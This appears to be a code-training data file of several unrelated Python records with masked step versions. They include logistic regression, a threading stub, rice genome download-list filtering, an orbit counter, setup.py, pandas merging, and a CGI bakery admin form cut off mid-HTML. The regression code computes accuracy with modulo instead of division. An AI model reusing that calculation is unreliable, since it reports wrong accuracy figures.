theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-4": "import numpy as np\nfrom scipy import optimize\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\ndef costReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply(1 - y, np.log(1 - sigmoid(X * theta.T)))\n reg = lamda / (2 * len(X)) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2)\n )\n return np.sum(first - second) / len(X) + reg\n\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n error = sigmoid(X * theta.T) - y\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n if i == 0:\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = np.sum(term) / len(X) + lamda / len(X) * theta[:, i]\n return grad\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-5": "#!/usr/bin/env/ python\n# -*- coding:utf-8 -*-\n# Created by: Vanish\n# Created on: 2019/9/25\n\n\nimport numpy as np\nfrom scipy import optimize\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\ndef costReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))\n reg = (lamda / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return np.sum(first - second) / len(X) + reg\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n\n if (i == 0):\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = (np.sum(term) / len(X)) + ((lamda / len(X)) * theta[:, i])\n\n return grad\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [1 if x >= 0.5 else 0 for x in probability]\n\ndef implement_for_LR(X_train, X_test, y_train, y_test,lamda=1):\n n = X_train.shape[1]\n # convert to numpy arrays and initalize the parameter array theta\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg, args=(X_train, y_train, lamda))\n\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y_test)]\n accuracy = (sum(map(int, correct)) % len(correct))\n print('accuracy = {0}%'.format(accuracy))",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
from threading import Thread, Lock
from utils import reloj
import random
class Imprimidor(Thread):
def __init__(self, nombre, berlin, bolsa_dinero):
super().__init__()
pass
def run(self):
'''
Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada
iteracion chequea si se cumple que hay problema con el dinero (20%)
'''
pass
def imprimir_dinero(self, dinero):
'''
Llamar a este método para imprimir dinero.
***Acá debes procurarte de evitar errores de concurrencia***
:param dinero:
:return:
'''
pass
def problema_papel(self):
'''
Probabilidad de problema con el papel de 20%
'''
pass
|
normal
|
{
"blob_id": "ab79e2f9584dbbb526c62bde882a1bc9874b56f9",
"index": 7903,
"step-1": "<mask token>\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n \"\"\"\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n \"\"\"\n pass\n <mask token>\n\n def problema_papel(self):\n \"\"\"\n Probabilidad de problema con el papel de 20%\n \"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n \"\"\"\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n \"\"\"\n pass\n\n def imprimir_dinero(self, dinero):\n \"\"\"\n Llamar a este método para imprimir dinero.\n ***Acá debes procurarte de evitar errores de concurrencia***\n :param dinero:\n :return:\n \"\"\"\n pass\n\n def problema_papel(self):\n \"\"\"\n Probabilidad de problema con el papel de 20%\n \"\"\"\n pass\n",
"step-4": "from threading import Thread, Lock\nfrom utils import reloj\nimport random\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n \"\"\"\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n \"\"\"\n pass\n\n def imprimir_dinero(self, dinero):\n \"\"\"\n Llamar a este método para imprimir dinero.\n ***Acá debes procurarte de evitar errores de concurrencia***\n :param dinero:\n :return:\n \"\"\"\n pass\n\n def problema_papel(self):\n \"\"\"\n Probabilidad de problema con el papel de 20%\n \"\"\"\n pass\n",
"step-5": "from threading import Thread, Lock\nfrom utils import reloj\nimport random\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n '''\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n '''\n pass\n\n def imprimir_dinero(self, dinero):\n '''\n Llamar a este método para imprimir dinero.\n ***Acá debes procurarte de evitar errores de concurrencia***\n :param dinero:\n :return:\n '''\n pass\n\n def problema_papel(self):\n '''\n Probabilidad de problema con el papel de 20%\n '''\n pass\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
#!/opt/Python/2.7.3/bin/python
import sys
from collections import defaultdict
import numpy as np
import re
import os
import argparse
from Bio import SeqIO
def usage():
test="name"
message='''
python CircosConf.py --input circos.config --output pipe.conf
'''
print message
def fasta_id(fastafile):
fastaid = defaultdict(str)
for record in SeqIO.parse(fastafile,"fasta"):
fastaid[record.id] = 1
return fastaid
#temperate.mPing.group.id
def readtable(infile):
data = defaultdict(str)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not data.has_key(unit[0]):
data[unit[0]] = 1
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input')
parser.add_argument('-o', '--output')
parser.add_argument('-v', dest='verbose', action='store_true')
args = parser.parse_args()
try:
len(args.input) > 0
except:
usage()
sys.exit(2)
unique_id = readtable(args.input)
#1 IRIS313-15896 Colombia Indica ERS467753 [email protected]:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra
infile = '../GigaScience/rice_line_IRRI_2466.download.list'
count = 0
other_id = defaultdict(lambda : int())
total_id = defaultdict(lambda : int())
r = re.compile(r'Japonica', re.IGNORECASE)
ofiles = []
for i in range(7):
ofile = open('%s.other%s.download.list' %(args.input, i), 'w')
ofiles.append(ofile)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not r.search(unit[3]):
continue
total_id[unit[1]] = 1
if not unique_id.has_key(unit[1]):
other_id[unit[1]] = 1
count = len(other_id.keys())
index = int(float(count)/100)
#print index, count, unit[1]
print >> ofiles[index], line
for i in range(7):
ofiles[i].close()
print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))
print 'other: %s' %(count)
print 'total: %s' %(len(total_id.keys()))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "fe0d6cc03512d54d2d8722551e3f2a7c1bf43997",
"index": 3581,
"step-1": "#!/opt/Python/2.7.3/bin/python\nimport sys\nfrom collections import defaultdict\nimport numpy as np\nimport re\nimport os\nimport argparse\nfrom Bio import SeqIO\n\ndef usage():\n test=\"name\"\n message='''\npython CircosConf.py --input circos.config --output pipe.conf\n\n '''\n print message\n\ndef fasta_id(fastafile):\n fastaid = defaultdict(str)\n for record in SeqIO.parse(fastafile,\"fasta\"):\n fastaid[record.id] = 1\n return fastaid\n\n\n#temperate.mPing.group.id\ndef readtable(infile):\n data = defaultdict(str)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2: \n unit = re.split(r'\\t',line)\n if not data.has_key(unit[0]):\n data[unit[0]] = 1\n return data\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input')\n parser.add_argument('-o', '--output')\n parser.add_argument('-v', dest='verbose', action='store_true')\n args = parser.parse_args()\n try:\n len(args.input) > 0\n except:\n usage()\n sys.exit(2)\n\n unique_id = readtable(args.input)\n #1 IRIS313-15896 Colombia Indica ERS467753 [email protected]:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra\n infile = '../GigaScience/rice_line_IRRI_2466.download.list'\n count = 0\n other_id = defaultdict(lambda : int())\n total_id = defaultdict(lambda : int())\n r = re.compile(r'Japonica', re.IGNORECASE)\n ofiles = []\n for i in range(7):\n ofile = open('%s.other%s.download.list' %(args.input, i), 'w')\n ofiles.append(ofile)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2:\n unit = re.split(r'\\t',line)\n if not r.search(unit[3]):\n continue\n total_id[unit[1]] = 1\n if not unique_id.has_key(unit[1]):\n other_id[unit[1]] = 1\n count = len(other_id.keys())\n index = int(float(count)/100)\n #print index, count, unit[1]\n print >> ofiles[index], line\n for i in range(7):\n ofiles[i].close()\n print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))\n print 'other: %s' %(count)\n print 'total: %s' %(len(total_id.keys()))\nif __name__ == '__main__':\n main()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
if __name__== '__main__':
with open('./input/day6', 'r') as f:
orbit_input = [l.strip().split(")") for l in f.readlines()]
planets = [planet[0] for planet in orbit_input]
planets1 = [planet[1] for planet in orbit_input]
planets = set(planets+planets1)
system = {}
print(orbit_input)
for inp in orbit_input:
system[inp[1]] = inp[0]
def compute_orbits(planet, system):
if planet == 'COM':
return 0
next_p = system[planet]
return 1 + compute_orbits(next_p, system)
num_orb = 0
for planet in planets:
num_orb = num_orb + compute_orbits(planet, system)
print(num_orb)
|
normal
|
{
"blob_id": "96778a238d8ed8ae764d0cf8ec184618dc7cfe18",
"index": 5790,
"step-1": "<mask token>\n",
"step-2": "if __name__ == '__main__':\n with open('./input/day6', 'r') as f:\n orbit_input = [l.strip().split(')') for l in f.readlines()]\n planets = [planet[0] for planet in orbit_input]\n planets1 = [planet[1] for planet in orbit_input]\n planets = set(planets + planets1)\n system = {}\n print(orbit_input)\n for inp in orbit_input:\n system[inp[1]] = inp[0]\n\n def compute_orbits(planet, system):\n if planet == 'COM':\n return 0\n next_p = system[planet]\n return 1 + compute_orbits(next_p, system)\n num_orb = 0\n for planet in planets:\n num_orb = num_orb + compute_orbits(planet, system)\n print(num_orb)\n",
"step-3": "\nif __name__== '__main__':\n with open('./input/day6', 'r') as f:\n orbit_input = [l.strip().split(\")\") for l in f.readlines()]\n planets = [planet[0] for planet in orbit_input]\n planets1 = [planet[1] for planet in orbit_input]\n planets = set(planets+planets1)\n system = {}\n print(orbit_input)\n\n for inp in orbit_input:\n system[inp[1]] = inp[0]\n\n def compute_orbits(planet, system):\n if planet == 'COM':\n return 0\n next_p = system[planet]\n return 1 + compute_orbits(next_p, system)\n\n num_orb = 0\n for planet in planets:\n num_orb = num_orb + compute_orbits(planet, system)\n print(num_orb)\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from setuptools import find_packages, setup
NAME = 'compoelem'
VERSION = "0.1.1"
setup(
name=NAME,
packages=['compoelem', 'compoelem.generate', 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect', 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],
include_package_data=True,
version=VERSION,
description='Library for generating and comparing compositional elements from art historic images.',
author='Tilman Marquart',
license='MIT',
python_requires='>=3.8',
install_requires=['opencv-python','numpy','typing','shapely','pyyaml','torch','torchvision','yacs','scikit-image', 'pandas'],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
test_suite='tests',
)
|
normal
|
{
"blob_id": "4f81eb7218fa1341bd7f025a34ec0677d46151b0",
"index": 6542,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name=NAME, packages=['compoelem', 'compoelem.generate',\n 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect',\n 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True, version=VERSION, description=\n 'Library for generating and comparing compositional elements from art historic images.'\n , author='Tilman Marquart', license='MIT', python_requires='>=3.8',\n install_requires=['opencv-python', 'numpy', 'typing', 'shapely',\n 'pyyaml', 'torch', 'torchvision', 'yacs', 'scikit-image', 'pandas'],\n setup_requires=['pytest-runner'], tests_require=['pytest'], test_suite=\n 'tests')\n",
"step-3": "<mask token>\nNAME = 'compoelem'\nVERSION = '0.1.1'\nsetup(name=NAME, packages=['compoelem', 'compoelem.generate',\n 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect',\n 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True, version=VERSION, description=\n 'Library for generating and comparing compositional elements from art historic images.'\n , author='Tilman Marquart', license='MIT', python_requires='>=3.8',\n install_requires=['opencv-python', 'numpy', 'typing', 'shapely',\n 'pyyaml', 'torch', 'torchvision', 'yacs', 'scikit-image', 'pandas'],\n setup_requires=['pytest-runner'], tests_require=['pytest'], test_suite=\n 'tests')\n",
"step-4": "from setuptools import find_packages, setup\nNAME = 'compoelem'\nVERSION = '0.1.1'\nsetup(name=NAME, packages=['compoelem', 'compoelem.generate',\n 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect',\n 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True, version=VERSION, description=\n 'Library for generating and comparing compositional elements from art historic images.'\n , author='Tilman Marquart', license='MIT', python_requires='>=3.8',\n install_requires=['opencv-python', 'numpy', 'typing', 'shapely',\n 'pyyaml', 'torch', 'torchvision', 'yacs', 'scikit-image', 'pandas'],\n setup_requires=['pytest-runner'], tests_require=['pytest'], test_suite=\n 'tests')\n",
"step-5": "from setuptools import find_packages, setup\nNAME = 'compoelem'\nVERSION = \"0.1.1\"\nsetup(\n name=NAME,\n packages=['compoelem', 'compoelem.generate', 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect', 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True,\n version=VERSION,\n description='Library for generating and comparing compositional elements from art historic images.',\n author='Tilman Marquart',\n license='MIT',\n python_requires='>=3.8',\n install_requires=['opencv-python','numpy','typing','shapely','pyyaml','torch','torchvision','yacs','scikit-image', 'pandas'],\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n test_suite='tests',\n)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import string
#takes file as input, outputs a dictionary of keys from the file
#file should be in format (apiName, key/id)
#dictionary key = apiName, value = key/id
def getKeys(f):
keys = {}
f = open(f, 'r')
for line in f:
apiInfo = line.split(',')
keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)
keys.pop('apiName', None)
return keys
#print(getKeys('keys.txt'))
|
normal
|
{
"blob_id": "3653c6fce33467600a3eea72578ed995606bfc03",
"index": 4100,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef getKeys(f):\n keys = {}\n f = open(f, 'r')\n for line in f:\n apiInfo = line.split(',')\n keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)\n keys.pop('apiName', None)\n return keys\n",
"step-3": "import string\n\n\ndef getKeys(f):\n keys = {}\n f = open(f, 'r')\n for line in f:\n apiInfo = line.split(',')\n keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)\n keys.pop('apiName', None)\n return keys\n",
"step-4": "import string\n\n#takes file as input, outputs a dictionary of keys from the file\n#file should be in format (apiName, key/id)\n#dictionary key = apiName, value = key/id\ndef getKeys(f):\n keys = {}\n f = open(f, 'r')\n for line in f:\n apiInfo = line.split(',')\n keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)\n keys.pop('apiName', None)\n return keys\n\n#print(getKeys('keys.txt'))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pandas as pd
from pandas import DataFrame
myencoding = 'utf-8'
chikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']
# chikenList = ['pelicana']
newframe = DataFrame()
for onestore in chikenList:
filename = onestore + '.csv'
myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)
# print(myframe.head())
# print('-'*30)
newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)
print(newframe.info())
totalfile = 'allstore.csv'
newframe.to_csv(totalfile, encoding=myencoding)
print(totalfile + '파일이 저장됨')
|
normal
|
{
"blob_id": "11a31d3276201105ca7485fa4e4eb711012accd5",
"index": 2190,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\nprint(newframe.info())\n<mask token>\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')\n",
"step-3": "<mask token>\nmyencoding = 'utf-8'\nchikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']\nnewframe = DataFrame()\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\nprint(newframe.info())\ntotalfile = 'allstore.csv'\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')\n",
"step-4": "import pandas as pd\nfrom pandas import DataFrame\nmyencoding = 'utf-8'\nchikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']\nnewframe = DataFrame()\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\nprint(newframe.info())\ntotalfile = 'allstore.csv'\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')\n",
"step-5": "import pandas as pd\nfrom pandas import DataFrame\n\nmyencoding = 'utf-8'\nchikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']\n# chikenList = ['pelicana']\n\nnewframe = DataFrame()\n\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n # print(myframe.head())\n # print('-'*30)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\n\nprint(newframe.info())\n\ntotalfile = 'allstore.csv'\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!C:\Python27\python
print('Content-Type:text/html\n\n')
print ("""
<html>
<head>
<link href="iconTech.png" rel="icon"/>
<meta name="viewport" content="width=device-width,intial-scale=1.0"/>
<link href="../css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="../css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link rel="stylesheet" href="../css/font-awesome.min.css" type="text/css"/>
<script src="../js/jquery.js"></script>
<script src="../js/bootstrap.min.js"></script>
<style>
.outer
{
min-height:100px;
}
.top
{
min-height:50px;
background:gray;
}
.logo
{
height:50px;
width:240px;
margin:5px 5px;
background:white;
font-size:30px;
font-family:Algerian;
border:5px double green;
}
.menu
{
height:50px;
width:1000px;
background:gray;
z-index:10;
}
#menu
{
background:none;
border:none;
box-shadow:none;
padding:1% 0%;
margin:0px;
font-size:15px;
}
#menu ul li a
{
color:white;
text-shadow:none;
font-weight:bold;
font-size:12px;
}
#menu ul li:hover
{
background:transparent;
}
.head
{
height:100px;
background:url('../bimg/d1.jpg');
background-attachment:fixed;
background-size:100% 100%;
}
.head1
{
height:100px;
background-color:rgba(0,0,0,.4);
color:white;
font-size:20px;
padding:2% 0%;
}
.addcake
{
min-height:550px;
margin-left:25%;
background:rgba(0,0,0,.3);
margin-top:20px;
margin-bottom:20px;
}
.footer
{
min-height:50px;
padding:1% 0%;
text-align:center;
color:white;
font-size:20px;
background:black;
}
</style>
</head>
<body>
<div class="col-sm-12 outer">
<div class="row">
<div class="col-sm-12 top">
<div class="row">
<div class="col-sm-3 logo">Bake<span style="color:orange;">-o-</span>logy</div>
<div class="col-sm-9 menu"> <nav class="navbar navbar-default" id="menu">
<div class="container-fluid">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only clpbtn">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1" >
<ul class="nav navbar-nav navbar-right">
<li><a href="index.py">Dashboard</a></li>
<li><a href="Addmenu.py">Add Menu</a></li>
<li><a href="Addservices.py">Add Services</a></li>
<li><a href="Addimages.py">Add Images</a></li>
<li><a href="OrderManagement.py">Order Management</a></li>
<li><a href="ContactManagement.py">Contact Management</a></li>
<li><a href="Changepassword.py">Change Password</a></li>
<li><a href="LogOut.py">LogOut</a></li>
</li>
</ul>
</div><!-- /.navbar-collapse -->
</div><!-- /.container-fluid -->
</nav>
</div></div></div>
<div class="col-sm-12 main">
<div class="row">
<div class="col-sm-12 head">
<div class="row">
<div class="col-sm-12 head1">
<div class="text-center"><span class="fa fa-cutlery "></span> Add Cake Menu </div>
</div>
</div></div>
</div></div>
<div class="col-sm-6 addcake">
<div class="h2 text-center">Add Cakes Menu</div>
<form action="../code/cakecode.py" enctype="multipart/form-data" method="post">
<div class="h4">Cake Name</div>
<input type="text" placeholder="Input Your Cake Name" name="cake" class="form-control">
<div class="h4">Cake Size</div>
<input type="text" placeholder="Input Your Cake size" name="size" class="form-control">
<div class="h4">Cake Weight</div>
<input type="text" placeholder="Input Your Cake Flavour" name="flavour" class="form-control">
<div class="h4">Price</div>
<input type="text" placeholder="Input Your Cake Weight" name="weight" class="form-control">
<div class="h4">Cake Flavour</div>
<input type="text" placeholder="Input Your Cake Price" name="price" class="form-control">
<div class="h4">Cake Image</div>
<input type="file" placeholder="Import Your Cake image" name="pic" class="form-control"><br/>
<input type="submit" class="form-control" value="Add">
</div>
<div class="col-sm-12 footer">
<div class="col-sm-6">©copyright:<a target="_blank" href="https://www.techpile.in">Techpile Technology.pvt.Ltd.</a>
</div>
<div class="col-sm-6">
Developed By:-Yash Rastogi</div>
</div>
</div>
</div>
</body>
</html>
""")
|
normal
|
{
"blob_id": "968cfcfe9d31adcd3a67a88a66e5ebe7b719be8d",
"index": 2841,
"step-1": "<mask token>\n",
"step-2": "print('Content-Type:text/html\\n\\n')\nprint(\n \"\"\"\n<html>\n<head>\n<link href=\"iconTech.png\" rel=\"icon\"/>\n<meta name=\"viewport\" content=\"width=device-width,intial-scale=1.0\"/>\n<link href=\"../css/bootstrap.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\n<link href=\"../css/bootstrap-theme.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\n<link rel=\"stylesheet\" href=\"../css/font-awesome.min.css\" type=\"text/css\"/>\n<script src=\"../js/jquery.js\"></script>\n<script src=\"../js/bootstrap.min.js\"></script>\n<style>\n.outer\n{\nmin-height:100px;\n}\n.top\n{\n min-height:50px;\n background:gray;\n}\n.logo\n{\n height:50px;\n width:240px;\n margin:5px 5px;\n background:white;\n font-size:30px;\n font-family:Algerian;\n border:5px double green;\n}\n.menu\n{\n height:50px;\n width:1000px;\n background:gray;\n z-index:10;\n}\n#menu\n{\n background:none;\n border:none;\n box-shadow:none;\n padding:1% 0%;\n margin:0px;\n font-size:15px;\n}\n#menu ul li a\n{\n color:white;\n text-shadow:none;\n font-weight:bold;\n font-size:12px;\n}\n#menu ul li:hover\n{\n background:transparent; \n}\n.head\n{\n height:100px;\n background:url('../bimg/d1.jpg');\n background-attachment:fixed;\n background-size:100% 100%;\n}\n.head1\n{\n height:100px;\n background-color:rgba(0,0,0,.4);\n color:white;\n font-size:20px;\n padding:2% 0%;\n}\n.addcake\n{\nmin-height:550px;\nmargin-left:25%;\nbackground:rgba(0,0,0,.3);\nmargin-top:20px;\nmargin-bottom:20px;\n}\n\n.footer\n{\n min-height:50px;\n padding:1% 0%;\n text-align:center;\n color:white;\n font-size:20px;\n background:black;\n}\n</style>\n</head>\n<body>\n<div class=\"col-sm-12 outer\">\n\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-sm-12 top\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t\t<div class=\"col-sm-3 logo\">Bake<span style=\"color:orange;\">-o-</span>logy</div>\n\t\t\t\t\t<div class=\"col-sm-9 menu\">\t\t\t\t\t<nav class=\"navbar navbar-default\" id=\"menu\">\n <div class=\"container-fluid\">\n <!-- Brand and toggle get grouped for better mobile display -->\n <div class=\"navbar-header\">\n <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-example-navbar-collapse-1\" aria-expanded=\"false\">\n <span class=\"sr-only clpbtn\">Toggle navigation</span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n </button>\n </div>\n<!-- Collect the nav links, forms, and other content for toggling -->\n <div class=\"collapse navbar-collapse\" id=\"bs-example-navbar-collapse-1\" >\n <ul class=\"nav navbar-nav navbar-right\">\n <li><a href=\"index.py\">Dashboard</a></li>\n <li><a href=\"Addmenu.py\">Add Menu</a></li>\n\t\t<li><a href=\"Addservices.py\">Add Services</a></li>\n\t\t<li><a href=\"Addimages.py\">Add Images</a></li>\n\t\t<li><a href=\"OrderManagement.py\">Order Management</a></li>\n\t\t<li><a href=\"ContactManagement.py\">Contact Management</a></li>\n\t\t<li><a href=\"Changepassword.py\">Change Password</a></li>\n\t\t<li><a href=\"LogOut.py\">LogOut</a></li>\n\t\t</li>\n \n\t\t </ul>\n\t\t\t \n </div><!-- /.navbar-collapse -->\n </div><!-- /.container-fluid -->\n</nav>\n \t\t\t\t\t\n\t\t </div></div></div>\n\t\t\t\t<div class=\"col-sm-12 main\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-sm-12 head\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-sm-12 head1\">\n\t\t\t\t<div class=\"text-center\"><span class=\"fa fa-cutlery \"></span> Add Cake Menu </div>\n\t\t\t\t</div>\n\t\t\t\t</div></div>\n\t\t\t\t</div></div>\n\t\t\t\t<div class=\"col-sm-6 addcake\">\n\t\t\t\t<div class=\"h2 text-center\">Add Cakes Menu</div>\n\t\t\t\t<form action=\"../code/cakecode.py\" enctype=\"multipart/form-data\" method=\"post\">\n\t\t\t\t<div class=\"h4\">Cake Name</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Name\" name=\"cake\" class=\"form-control\">\n\t\t\t\t<div class=\"h4\">Cake Size</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake size\" name=\"size\" class=\"form-control\">\n <div class=\"h4\">Cake Weight</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Flavour\" name=\"flavour\" class=\"form-control\">\n <div class=\"h4\">Price</div>\n\t\t\t\t <input type=\"text\" placeholder=\"Input Your Cake Weight\" name=\"weight\" 